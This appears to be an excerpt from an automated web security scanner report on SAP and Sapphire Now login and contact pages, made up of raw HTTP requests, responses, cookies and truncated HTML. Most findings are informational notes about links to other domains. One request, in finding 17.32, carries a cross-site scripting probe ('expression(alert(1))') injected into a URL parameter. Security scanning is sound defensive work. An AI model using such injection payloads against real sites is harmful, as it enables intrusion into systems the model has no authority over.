37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore&ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:12 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:12 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:32:12 GMT; path=/
Set-Cookie: CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:12 GMT
Content-Length: 148981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="
...[SNIP]...
<noscript>
<iframe src="https://fls.doubleclick.net/activityi;src=3233230;type=uk-bo509;cat=uk-bo303;ord=1;num=1?" width="1" height="1" frameborder="0" style="display:none"></iframe>
...[SNIP]...
<!-- End of DoubleClick Floodlight Tag: Please do not remove -->

<img src="https://na.decdna.net/n/79946/100649/CRSREG/x/e?value=0&#38;trans=&#38;domain=na.decdna.net" width="1" height="1" border="0" />


<!-- STAGE -->
...[SNIP]...
<noscript><img src="//s.analytics.yahoo.com/p.pl?a=10002109824374&amp;js=no" width="1" height="1"></noscript>
...[SNIP]...
17.28. https://www.sap.com/contactsap/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /contactsap/index.epx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /contactsap/index.epx?pmelayer=true&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sap.com/customer-showcase/innovation/index.epx?olt=CG4D999063
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:40 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:40 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:40 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:40 GMT
Content-Length: 75986


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
<noscript><img src="//s.analytics.yahoo.com/p.pl?a=10002109824374&amp;js=no" width="1" height="1"></noscript>
...[SNIP]...
17.29. https://www.sap.com/host.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /host.epx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /host.epx?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; SAP.SITE.COOKIE=cmpgn.code=CRM-US10-SGE-FRBUSOPT&cmpn=CRM-US10-SGE-FRBUSOPT; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; OriginatingURL=http://www.sapbusinessoptimizer.com/; SingleSignOnURL=51a3d747-8c02-417d-8f96-ae6e0ddd405d||||http://www.sapbusinessoptimizer.com/|; pmeoriginalurl=%2fhost.epx; pmereturnurl=%2fgwtservice.epx; pmelayerurl=%2fprofile%2flogin.epx%3fCCB945D0C99C211CE485301170A282A69A2B5D457FDCA8EAE05552155D0CA1E3EEFD315BAADABA281797FD8B20AF2220%26pmelayer%3dtrue; pmedialogmode=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:30:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:30:16 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:30:16 GMT; path=/
Set-Cookie: pmelayerurl=; domain=.sap.com; path=/
Set-Cookie: pmedialogmode=; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:30:15 GMT
Content-Length: 32896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<noscript><img src="//s.analytics.yahoo.com/p.pl?a=10002109824374&amp;js=no" width="1" height="1"></noscript>
...[SNIP]...
17.30. https://www.sap.com/profile/login.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/login.epx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /profile/login.epx?pmelayer=true&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/about-sap/events/worldtour/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:26:45 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:26:45 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:26:46 GMT
Content-Length: 90895


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
<noscript><img src="//s.analytics.yahoo.com/p.pl?a=10002109824374&amp;js=no" width="1" height="1"></noscript>
...[SNIP]...
17.31. https://www.sap.com/profile/slogin.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/slogin.epx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

POST /profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
Content-Length: 432
Cache-Control: max-age=0
Origin: https://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.sap.com/profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

__EVENTTARGET=mobjTemplate%24loginctrl%24lnkPassword&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTIxMTM5MzQyNTkPZBYCAgUPZBYCAgMPZBYCZg9kFgICFw9kFgJmD2QWAgIBDxYCHghSZWZlcnJlcgUlL2Fib3V0LXNhcC9ldmVudHMvd29y
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:26:05 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:26:05 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:26:06 GMT
Content-Length: 11252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
<noscript><img src="//s.analytics.yahoo.com/p.pl?a=10002109824374&amp;js=no" width="1" height="1"></noscript>
...[SNIP]...
17.32. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspxfcf2f%22style%3d%22x%3aexpression(alert(1))%2234bced315ef HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspxfcf2f%22style%3d%22x%3aexpression(alert(1))%2234bced315ef
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=270210419.1641825112.1318688722.1318688722.1318688722.1; __utmz=270210419.1318688724.1.1.utmcsr=sapandasug.com|utmccn=(referral)|utmcmd=referral|utmcct=/; 37021986-VID=5110247826455

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 15:28:49 GMT
Content-Length: 42972


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?bd72f70e-784b-470a-a04f-9eafd0577178"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
<div class="sapLogo" ><a href="http://www.sap.com" title="SAP" target="_blank"><img src="App_Themes/Default/images/sap-logo.png">
...[SNIP]...
<li><a href="https://www.sap.com/campaign/G_NL_SUBSCRIPTION_SAP_BUSINESS_FLASH/index.epx?URL_ID=WEB11" target="_blank">Newsletter</a>
...[SNIP]...
<li><a href="http://www.sap.com/solutions/products/sap-bydesign/index.epx#/buy-now/index.epx?class=utilitynav-buy" target="_self">Buy Now</a>
...[SNIP]...
<li><a href="https://www.sap.com/contactsap/index.epx?pmelayer=true" target="_blank"> Contact Us</a>
...[SNIP]...
<li><a href="http://www.sapphirenow.cn" target="_blank" >Beijing, China Nov. 15-17, 2011</a>
...[SNIP]...
<li><a href="http://www.sapandasug.com/">Orlando, Florida May 14-16, 2012</a>
...[SNIP]...
<li><a href="http://www.sap.com/about-sap/events/worldtour/index.epx">SAP World Tour 2011</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx" target="_blank">SAP.com</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx#/events/index.epx" target="_blank">Events</a>
...[SNIP]...
<li><a href="http://www.linkedin.com/groups?mostPopular=&gid=2855549" target="_blank" class="linkedin">linkedin</a>
...[SNIP]...
<li><a href="http://youtube.com/sapphirenow" target="_blank" class="youtube">youtube</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sapphirenow" target="_blank" class="facebook">facebook</a>
...[SNIP]...
<li><a href="http://Twitter.com/sapphirenow" target="_blank" class="twitter">twitter</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/privacy.epx" target ="_blank">Privacy</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/terms_of_use.epx" target="_blank">Terms of Use</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/impressum.epx" target ="_blank">Legal Disclosure</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx" target="_blank">Copyright</a>
...[SNIP]...
<br />
Be the first to know when; sign up for an email alert, <a href="https://www.delegate.com/sap/sapphire/interest/" class="aLink" target="_blank">click here</a>
...[SNIP]...
<td width="40"><a href="http://twitter.com/#!/sapteched" target="_blank"><img src="App_Themes/login/images/twitter_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.facebook.com/sapteched" target="_blank"><img src="App_Themes/login/images/facebook_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.youtube.com/user/SAPCommunities#g/c/3DC79D602F6E7FE1" target="_blank"><img src="App_Themes/login/images/youtube_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.linkedin.com/osview/canvas?_ch_page_id=2&_ch_panel_id=3&_ch_app_id=30&_applicationId=2000&appParams={"referrer"%3A"profile","go_to"%3A"events/540377"}&_ownerId=11767433&completeUrlHash=kekP" target="_blank"><img src="App_Themes/login/images/linkedin_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://Twitter.com/sapphirenow" target="_blank"><img src="App_Themes/login/images/twitter_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.facebook.com/sapphirenow" target="_blank"><img src="App_Themes/login/images/facebook_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://youtube.com/sapphirenow" target="_blank" ><img src="App_Themes/login/images/youtube_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.linkedin.com/groups?mostPopular=&gid=2855549" target="_blank"><img src="App_Themes/login/images/linkedin_pop.png" border="0" alt=" " />
...[SNIP]...
17.33. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapandasug.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=t2xe1y45iffmlseg0oqr4aja; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:25:13 GMT
Content-Length: 42868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?11082289-fc6a-412a-85c6-d6bb9fdb83e8"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
<div class="sapLogo" ><a href="http://www.sap.com" title="SAP" target="_blank"><img src="App_Themes/Default/images/sap-logo.png">
...[SNIP]...
<li><a href="https://www.sap.com/campaign/G_NL_SUBSCRIPTION_SAP_BUSINESS_FLASH/index.epx?URL_ID=WEB11" target="_blank">Newsletter</a>
...[SNIP]...
<li><a href="http://www.sap.com/solutions/products/sap-bydesign/index.epx#/buy-now/index.epx?class=utilitynav-buy" target="_self">Buy Now</a>
...[SNIP]...
<li><a href="https://www.sap.com/contactsap/index.epx?pmelayer=true" target="_blank"> Contact Us</a>
...[SNIP]...
<li><a href="http://www.sapphirenow.cn" target="_blank" >Beijing, China Nov. 15-17, 2011</a>
...[SNIP]...
<li><a href="http://www.sapandasug.com/">Orlando, Florida May 14-16, 2012</a>
...[SNIP]...
<li><a href="http://www.sap.com/about-sap/events/worldtour/index.epx">SAP World Tour 2011</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx" target="_blank">SAP.com</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx#/events/index.epx" target="_blank">Events</a>
...[SNIP]...
<li><a href="http://www.linkedin.com/groups?mostPopular=&gid=2855549" target="_blank" class="linkedin">linkedin</a>
...[SNIP]...
<li><a href="http://youtube.com/sapphirenow" target="_blank" class="youtube">youtube</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sapphirenow" target="_blank" class="facebook">facebook</a>
...[SNIP]...
<li><a href="http://Twitter.com/sapphirenow" target="_blank" class="twitter">twitter</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/privacy.epx" target ="_blank">Privacy</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/terms_of_use.epx" target="_blank">Terms of Use</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/impressum.epx" target ="_blank">Legal Disclosure</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx" target="_blank">Copyright</a>
...[SNIP]...
<br />
Be the first to know when; sign up for an email alert, <a href="https://www.delegate.com/sap/sapphire/interest/" class="aLink" target="_blank">click here</a>
...[SNIP]...
<td width="40"><a href="http://twitter.com/#!/sapteched" target="_blank"><img src="App_Themes/login/images/twitter_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.facebook.com/sapteched" target="_blank"><img src="App_Themes/login/images/facebook_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.youtube.com/user/SAPCommunities#g/c/3DC79D602F6E7FE1" target="_blank"><img src="App_Themes/login/images/youtube_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.linkedin.com/osview/canvas?_ch_page_id=2&_ch_panel_id=3&_ch_app_id=30&_applicationId=2000&appParams={"referrer"%3A"profile","go_to"%3A"events/540377"}&_ownerId=11767433&completeUrlHash=kekP" target="_blank"><img src="App_Themes/login/images/linkedin_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://Twitter.com/sapphirenow" target="_blank"><img src="App_Themes/login/images/twitter_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.facebook.com/sapphirenow" target="_blank"><img src="App_Themes/login/images/facebook_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://youtube.com/sapphirenow" target="_blank" ><img src="App_Themes/login/images/youtube_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.linkedin.com/groups?mostPopular=&gid=2855549" target="_blank"><img src="App_Themes/login/images/linkedin_pop.png" border="0" alt=" " />
...[SNIP]...
17.34. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapandasug.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

